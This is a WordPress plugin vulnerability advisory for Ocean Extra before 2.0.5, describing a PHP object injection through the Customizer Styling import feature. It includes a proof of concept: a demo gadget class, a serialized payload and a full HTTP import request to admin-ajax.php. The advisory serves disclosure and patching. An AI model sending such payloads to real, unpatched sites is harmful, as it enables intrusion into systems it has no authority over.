WordPress Plugin Vulnerabilities

Ocean Extra < 2.0.5 - Admin+ PHP Objection Injection

Description

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named import.dat with the following content: O:4:"Evil":0:{};

Import the file via the "Import Customizer Styling" feature in Appearance > OceanWP > Customizer (requires the OceanWP theme to be active)

The view the response of the import request made, which will have the "Arbitrary deserialization" message

POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/1.1
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=oceanwp
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------371888087213614698033751989022
Content-Length: 542
Connection: close
Cookie: [admin+]

-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="file"; filename="localhost-wordpress-oceanwp-export.dat"
Content-Type: application/octet-stream

O:4:"Evil":0:{};
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="action"

oceanwp_cp_customizer_import
-----------------------------371888087213614698033751989022
Content-Disposition: form-data; name="_nonce"

166c9022e0
-----------------------------371888087213614698033751989022--

Affects Plugins

Fixed in 2.0.5

References

Classification

Type
OBJECT INJECTION
CWE

Miscellaneous

Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-10-10 (about 1 years ago)
Added
2022-10-10 (about 1 years ago)
Last Updated
2022-10-10 (about 1 years ago)

Other